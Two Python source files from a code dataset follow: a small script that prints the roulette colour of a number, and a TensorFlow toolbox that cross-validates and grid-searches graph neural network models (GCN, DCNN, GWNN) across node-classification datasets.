283a8ab3ebc7dff5d4056886099335bd3d4d7105 | Python | NeoWhiteHatA/all_my_python | /march/win_color.py | UTF-8 | 689 | 3.546875 | 4 | [] | no_license | sota = int(input('Введите цифру или число от 0 до 36:'))
def roulette_color(number):
    """Return the roulette colour for `number` (0-36), or 'error' outside it.

    0 is green; in 1-10 and 19-28 even numbers map to 'red' and odd to
    'black'; in 11-18 and 29-36 the mapping is reversed.

    BUG FIX: the original tested parity with `sota // 2 == 0` (floor
    division), which is 0 only for 0 and 1 -- so nearly every "even" branch
    was dead and e.g. all of 2-10 printed 'black'.  The paired ==0/!=0
    branches show parity was intended, hence `% 2` here.
    NOTE(review): even with the fix, the colour assignment looks inverted
    relative to the standard European roulette layout (real 2 is black);
    kept as the author wrote it -- confirm against the intended wheel.
    """
    if not 0 <= number <= 36:
        return 'error'
    if number == 0:
        return 'green'
    is_even = number % 2 == 0
    if 1 <= number <= 10 or 19 <= number <= 28:
        return 'red' if is_even else 'black'
    return 'black' if is_even else 'red'


if __name__ == '__main__':
    # `sota` is read from the user on the line above this block.
    print(roulette_color(sota))
| true |
f02ba1bc8d65010739c5a880c78fa12becf11ea8 | Python | cracer/graph-classification-TF2-toolbox | /toolbox/main.py | UTF-8 | 18,291 | 2.546875 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
""" main.py
Created on 17-02-21
@author: Pierre-François De Plaen
"""
# Import Python modules
import os
import re
from random import randint
# Remove TensorFlow information messages
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['TF_CPP_MIN_VLOG_LEVEL'] = '3'
# Import TensorFlow and Pandas
import tensorflow as tf
import pandas as pd
# Import the toolbox
from utils import *
from fit import fit
# Graph Convolutional Network (GCN)
from methods.GCN.models import GCN
import methods.GCN.params as GCNparams
import methods.GCN.utils as GCNutils
# Diffusion Convolutional Neural Network (DCNN)
from methods.DCNN.models import DCNN
import methods.DCNN.params as DCNNparams
import methods.DCNN.utils as DCNNutils
# Graph Wavelet Neural Network (GWNN)
from methods.GWNN.models import GWNN
import methods.GWNN.params as GWNNparams
import methods.GWNN.utils as GWNNutils
def validate_model(model_name, model_info, dataset_name, verbose=1, location=None):
    """
    Run 10 times with 5 folds the model passed in argument on the dataset passed in argument.
    All combinations of the params_range are run, the best results are saved in the folder *location*
    :param model_name: (str) name of the model
    :param model_info: (dict) dictionary with the information about the model (params_range, params_fct, utils_fct and function)
    :param dataset_name: (str) dataset path, datasets must be stored in data/datasets/DATASET_NAME/...
    :param verbose: (int) verbosity for the execution
    :param location: (str) string with the folder location for saving the results. Creates a new random folder if None
    :return: (mean_stats, std_stats, best_params, best_params_mode) -- mean and std over runs of the
             per-run statistics dicts, the most frequently selected hyper-parameters, and the
             fraction of runs that selected them
    """
    ### Create the directory for saving the results if it doesn't exist yet ###
    if location is None:
        location = str(randint(1000, 9999))
    save_directory = os.path.dirname(os.path.abspath(__file__)) + '/results/' + location + '/'
    if not os.path.exists(save_directory):
        os.makedirs(save_directory)
    ### Initialize the parameters ###
    params_range = model_info['params_range']
    model_params = model_info['params_fct']
    model_utils = model_info['utils_fct']
    model_func = model_info['function']
    params_key = list(params_range.keys())
    n_params = len(params_key)
    keys_stats = ['train_acc', 'valid_acc', 'test_acc', 'epoch']
    # One grid axis per hyper-parameter; grid_dim[i] = number of candidate values.
    grid_dim = tuple([len(val) for val in params_range.values()])
    ### Save results in a Pandas DataFrame ###
    column_names = ['run_id'] + keys_stats + params_key
    runs_results = pd.DataFrame(columns=column_names)
    ### Cross-validation: 10 runs of 5 folds ###
    runs = load_cross_validation_run(dataset_name) # load all runs index associated to the given dataset
    # best_params_occ counts, per grid cell, how often that hyper-parameter
    # combination was selected as best across runs.
    best_params_occ = np.zeros(grid_dim)
    n_runs = len(runs)
    global_stats_params = [None] * n_runs
    for i in range(n_runs):
        if verbose > 0:
            print("RUN : " + str(i))
        run = runs[i]
        t_v_fold_index = run['sub_fold']
        test_index = run['test']
        n_fold = len(t_v_fold_index)
        stats_params = [None] * n_fold
        for j in range(n_fold):
            if verbose > 0:
                print("FOLD : " + str(j))
            # Fold j is the validation set; the remaining folds form the train set.
            folds = [k for k in range(n_fold)]
            folds.remove(j)
            train_index = sum([t_v_fold_index[z] for z in folds], [])
            val_index = t_v_fold_index[j]
            stat_params = build_dict(keys_stats, grid_dim)
            # Recursive grid search: fixes one hyper-parameter per recursion
            # level; at the deepest level, fits the model and stores the stats
            # at the grid cell addressed by `index`.
            # NOTE(review): the local rebinding `stats_params = save_dict(...)`
            # inside loop() shadows the outer per-fold list and reads
            # `stat_params` (singular) -- the names are confusingly close;
            # the useful effect comes from save_dict mutating/returning
            # stat_params, confirm in utils.
            def loop(dataset_name, train_index, val_index, test_index, grid_dim, stats_params, params_range, params_key,
                     level, params_value, index):
                if level == n_params:
                    # fit the model
                    if verbose > 0:
                        print(f"Parameters: {params_value}")
                    result = fit(dataset_name, train_index, val_index, test_index, model_params, model_utils, model_func, params_value=params_value, verbose=verbose)
                    stats_params = save_dict(stat_params, result, tuple(index))
                else:
                    for i_level in range(grid_dim[level]):
                        key = params_key[level]
                        params_value[key] = params_range[key][i_level]
                        index[level] = i_level
                        loop(dataset_name, train_index, val_index, test_index, grid_dim, stats_params, params_range,
                             params_key, level + 1, params_value, index)
            params_value = build_dict(params_key)
            loop(dataset_name, train_index, val_index, test_index, grid_dim, stats_params, params_range, params_key, 0,
                 params_value, [0 for i in range(n_params)])
            stats_params[j] = stat_params
        # mean performance for each params on all folds
        mean_stats_params = merge_dicts(stats_params, np.mean)
        global_stats_params[i], best_params_index, best_params = get_best_params(mean_stats_params, params_range,
                                                                                ref_key='valid_acc')
        best_params_occ[best_params_index] += 1
        runs_results.loc[len(runs_results)] = [str(i)] + list(global_stats_params[i].values()) + list(best_params.values())
    # mean and std of performance over all runs
    mean_global_stats_params = merge_dicts(global_stats_params, np.mean)
    std_global_stats_params = merge_dicts(global_stats_params, np.std)
    # best params (most of occurrences)
    # Normalise occurrence counts to frequencies; the mode is the frequency of
    # the most often selected combination.
    best_params_occ /= n_runs
    best_params_index = max_array_index(best_params_occ)
    best_params_mode = best_params_occ[tuple(best_params_index)]
    best_params = get_params(best_params_index, params_range)
    ### Save DataFrame to file ###
    runs_results.loc[len(runs_results)] = ['MEAN'] + list(mean_global_stats_params.values()) + [None for _ in range(len(best_params))]
    runs_results.loc[len(runs_results)] = ['STD'] + list(std_global_stats_params.values()) + [None for _ in range(len(best_params))]
    if verbose > 0:
        print(runs_results)
    csv_name = "{}_{}.csv".format(dataset_name, model_name)
    # Append if the results file already exists, otherwise create it.
    aw = 'a' if os.path.exists(save_directory+csv_name) else 'w'
    with open(save_directory+csv_name, aw) as f:
        f.write("-- Parameters range: \n")
        for p_name, p_vals in params_range.items():
            f.write(f"{p_name} ; {[v for v in p_vals]}\n")
        f.write("\n")
        f.write("-- Best parameters: \n") # best params (most of occurences)
        # NOTE(review): best_params_occ was already divided by n_runs above,
        # so this second division makes the "mode" written to the CSV n_runs
        # times smaller than the returned best_params_mode (the argmax, and
        # hence best_params, is unaffected).  Looks unintended -- confirm.
        best_params_occ /= n_runs
        best_params_index = max_array_index(best_params_occ)
        best_params = get_params(best_params_index, params_range)
        for p_name, p_val in best_params.items():
            f.write(f"{p_name} ; {p_val}\n")
        f.write(f"mode ; {best_params_occ[tuple(best_params_index)]}\n\n")
        f.write("-- Run details: \n")
        runs_results.to_csv(f, index=False, sep=';', line_terminator='\n')
        f.write("\n")
    # Redundant: the `with` block above already closed the file.
    f.close()
    return mean_global_stats_params, std_global_stats_params, best_params, best_params_mode
def compute_parameter_influence(model_name, model_info, dataset_name, verbose=1, location=None):
    """
    Measure the influence of a single hyper-parameter on a model.

    Runs the model over every pre-saved cross-validation run/fold of the dataset,
    fitting once per candidate value of the *first* parameter in 'params_range'
    (the swept parameter). Every other parameter must have exactly one value.
    All per-(run, fold, value) results are appended to a .csv file in *location*.

    :param model_name: (str) name of the model
    :param model_info: (dict) dictionary with the information about the model
        (params_range, params_fct, utils_fct and function); 'params_range' must
        contain only one value per parameter, except for the first one, which is swept
    :param dataset_name: (str) dataset path, datasets must be stored in data/datasets/DATASET_NAME/...
    :param verbose: (int) verbosity for the execution
    :param location: (str) folder name for saving the results; a random 4-digit folder is created if None
    :return: (pd.DataFrame) one row per (run, fold, parameter value) with train/valid/test accuracy and epoch
    :raises ValueError: if a non-swept parameter does not have exactly one candidate value
    """
    ### Create the directory for saving the results if it doesn't exist yet ###
    if location is None:
        location = str(randint(1000, 9999))
    save_directory = os.path.dirname(os.path.abspath(__file__)) + '/results/' + location + '/'
    if not os.path.exists(save_directory):
        os.makedirs(save_directory)
    ### Initialize the parameters ###
    params_range = model_info['params_range']
    model_params = model_info['params_fct']
    model_utils = model_info['utils_fct']
    model_func = model_info['function']
    keys_stats = ['train_acc', 'valid_acc', 'test_acc', 'epoch']
    ### Save results in a Pandas DataFrame ###
    column_names = ['run_id', 'fold_id', 'param_value'] + keys_stats
    all_results = pd.DataFrame(columns=column_names)
    varying_param_name = next(iter(params_range))  # first entry is the swept parameter
    varying_param_values = params_range[varying_param_name]
    # NOTE(review): this mutates the caller's params_range dict — callers (e.g.
    # run_on_best_params) pass a copy; confirm if reused elsewhere.
    del params_range[varying_param_name]
    params_value = dict()
    for key, value in params_range.items():
        # BUGFIX: the exception was previously constructed but never raised, and
        # the guard (len(value) > 0) fired for any non-empty list; enforce the
        # documented "exactly one value" contract instead.
        if len(value) != 1:
            raise ValueError(f"Parameter '{key}' in 'params_range' must have exactly one value")
        params_value[key] = value[0]  # since there is only one value in the list
    ### Cross-validation: 10 runs of 5 folds ###
    runs = load_cross_validation_run(dataset_name)  # load all runs index associated to the given dataset
    n_runs = len(runs)
    for i in range(n_runs):
        if verbose > 0:
            print("RUN : " + str(i))
        run = runs[i]
        t_v_fold_index = run['sub_fold']
        test_index = run['test']
        n_fold = len(t_v_fold_index)
        for j in range(n_fold):
            if verbose > 0:
                print("FOLD : " + str(j))
            # all folds except j form the training set; fold j is validation
            folds = [k for k in range(n_fold)]
            folds.remove(j)
            train_index = sum([t_v_fold_index[z] for z in folds], [])
            val_index = t_v_fold_index[j]
            for val in varying_param_values:
                params_value[varying_param_name] = val
                # fit the model with the current value of the swept parameter
                if verbose > 0:
                    print(f"Parameters: {params_value}")
                result = fit(dataset_name, train_index, val_index, test_index, model_params, model_utils, model_func, params_value=params_value, verbose=verbose)
                # tensors are converted to plain numpy values before storage
                all_results.loc[len(all_results)] = [str(i), str(j), str(val)] + list([el.numpy() if tf.is_tensor(el) else el for el in result.values()])
    ### Save DataFrame to file ###
    if verbose > 0:
        with pd.option_context('display.max_rows', None, 'display.max_columns', None):
            print(all_results)
    csv_name = "{}_{}.csv".format(dataset_name, model_name)
    # append when a previous result file exists, otherwise create it
    aw = 'a' if os.path.exists(save_directory+csv_name) else 'w'
    with open(save_directory+csv_name, aw) as f:
        f.write("-- Parameters range: \n")
        f.write(f"{varying_param_name} ; {[v for v in varying_param_values]}\n")
        for p_name, p_vals in params_range.items():
            f.write(f"{p_name} ; {p_vals[0]}\n")
        f.write("\n")
        f.write("-- Run full details: \n")
        all_results.to_csv(f, index=False, sep=';', line_terminator='\n')
        f.write("\n")
    return all_results
def run_on_best_params(models, datasets, verbose=1, folder_path="/results/parameters_fitting/", location=None, get_param_influence=False):
    """
    This function runs each model on each dataset passed in argument and uses the best parameters previously saved in folder_path
    results are automatically saved in a .csv file
    :param models: dictionary with all the models to run:
            {
            MODEL_1_NAME : {
                'function': MODEL_1_FUNCTION_PATH,
                'params_fct': MODEL_1_PARAMETERS_PATH,
                'utils_fct': MODEL_1_UTILS_PATH,
                'params_range': MODEL_1_DICT_OF_PARAMETERS_RANGES
            },
            MODEL_2_NAME : {...},
            ...
            }
    :param datasets: list of dataset paths (strings), datasets must be stored in data/datasets/DATASET_PATH/...
    :param verbose: verbosity for the execution
    :param folder_path: string with the relative path of the folder in which the parameters are saved
    :param location: string with the folder location for saving the results. Creates a new random folder if None
    :param get_param_influence: (bool) if True, run compute_parameter_influence with the best parameters
        instead of validate_model, and return its per-dataset results
    :return: dict mapping dataset name to the parameter-influence DataFrame when get_param_influence is
        True, otherwise None
    :raises NameError: if a saved activation function name is not recognized
    """
    if get_param_influence:
        return_dict = dict()
    for model_name, model_info in models.items():
        if verbose > 0:
            print(f"----- Training model: {model_name}")
        for dataset in datasets:
            if verbose > 0:
                print(f" --- Dataset: {dataset}")
            # recover the best params saved by a previous fitting run
            model_info_full = model_info.copy()
            dict_of_params = model_info["params_range"].copy()
            save_directory = os.path.dirname(os.path.abspath(__file__)) + folder_path
            csv_name = "{}_{}.csv".format(dataset, model_name)
            with open(save_directory + csv_name, 'r') as f:
                line = f.readline()
                # skip ahead to the best-parameters section
                # NOTE(review): loops forever on a malformed file — assumes the marker is present
                while line.strip() != "-- Best parameters:":
                    line = f.readline()
                line = f.readline()
                while re.search(r"mode", line) is None:  # add parameters until the 'mode' line
                    line = line.replace(" ", "")
                    line = line.replace("\n", "")
                    sub = line.split(";")  # lines look like "name ; value"
                    if sub[0] not in dict_of_params.keys():
                        if sub[0] != 'activation':
                            data = int(sub[1]) if sub[1].isdigit() else float(sub[1])
                            dict_of_params[sub[0]] = [data]
                        else:
                            # map the saved activation name back to the tf function
                            data = str(sub[1])
                            if 'sigmoid' in data:
                                activation = tf.nn.sigmoid
                            elif 'tanh' in data:
                                activation = tf.nn.tanh
                            elif 'relu' in data:
                                activation = tf.nn.relu
                            else:
                                # BUGFIX: the exception was previously constructed but never
                                # raised (and the message had a typo), so an unknown name
                                # silently reused the activation from a previous iteration.
                                raise NameError("Activation function not recognized")
                            dict_of_params['activation'] = [activation]
                    line = f.readline()
            model_info_full["params_range"] = dict_of_params
            # run with the recovered best parameters
            if get_param_influence:
                return_dict[dataset] = compute_parameter_influence(model_name, model_info_full, dataset_name=dataset, verbose=verbose, location=location)
            else:
                validate_model(model_name, model_info_full, dataset_name=dataset, verbose=verbose, location=location)
    if get_param_influence:
        return return_dict
def run_experiments(models, datasets, verbose=1, location=None):
    """
    Validate every model on every dataset; results are automatically saved to a .csv file.

    :param models: dictionary with all the models to run:
            {
            MODEL_1_NAME : {
                'function': MODEL_1_FUNCTION_PATH,
                'params_fct': MODEL_1_PARAMETERS_PATH,
                'utils_fct': MODEL_1_UTILS_PATH,
                'params_range': MODEL_1_DICT_OF_PARAMETERS_RANGES
            },
            MODEL_2_NAME : {...},
            ...
            }
    :param datasets: list of dataset paths (strings), datasets must be stored in data/datasets/DATASET_PATH/...
    :param verbose: verbosity for the execution
    :param location: string with the folder location for saving the results. Creates a new random folder if None
    :return: /
    """
    chatty = verbose > 0  # verbosity flag, invariant across the loops
    for name, info in models.items():
        if chatty:
            print(f"----- Training model: {name}")
        for ds in datasets:
            if chatty:
                print(f" --- Dataset: {ds}")
            # validate_model handles the full 10-run / 5-fold procedure and saving
            _mean_stats, _std_stats, _best, _mode = validate_model(
                name, info, dataset_name=ds, verbose=verbose, location=location)
    if chatty:
        print("\nRUN COMPLETE !")
if __name__ == '__main__':
    # Fit and validate the main models (GCN, DCNN and GWNN) using 10 runs with
    # 5-fold-validation on multiple datasets.
    dataset_names = [
        'mytexasA100Xsym', 'mywashingtonA100Xsym', 'mywisconsinA100Xsym', 'mycornellA100Xsym',
        'myciteseerA100Xsym', 'mycoraA100Xsym', 'myfacebookA100X107', 'myfacebookA100X1684',
        'myfacebookA100X1912', 'mywikipediaA100Xsym', 'myamazonphotoA100Xsym', 'myamazoncomputersA100Xsym',
    ]

    # Each model configuration bundles its constructor, parameter/utils helpers
    # and the hyper-parameter grid to search over.
    gwnn_setup = {
        'function': GWNN,
        'params_fct': GWNNparams,
        'utils_fct': GWNNutils,
        'params_range': {
            'learning_rate': [0.001, 0.01],
            'hidden_layer_sizes': [16, 32, 64],
            'wavelet_s': [1 / 256, 1 / 64, 1 / 16, 1 / 4, 1 / 2, 1],
        },
    }
    dcnn_setup = {
        'function': DCNN,
        'params_fct': DCNNparams,
        'utils_fct': DCNNutils,
        'params_range': {
            'activation': [tf.nn.tanh],
            'learning_rate': [0.001, 0.01],
            'hops': [1, 2, 3],
        },
    }
    gcn_setup = {
        'function': GCN,
        'params_fct': GCNparams,
        'utils_fct': GCNutils,
        'params_range': {
            'learning_rate': [0.001, 0.01],
            'hidden_layer_sizes': [16, 32, 64],
        },
    }
    models_to_run = {'GWNN': gwnn_setup, 'DCNN': dcnn_setup, 'GCN': gcn_setup}

    # Only the datasets from index 4 onward are run here (citeseer and later);
    # presumably the earlier ones were already processed — confirm before reuse.
    run_experiments(models_to_run, dataset_names[4:], verbose=1, location="parameters_fitting")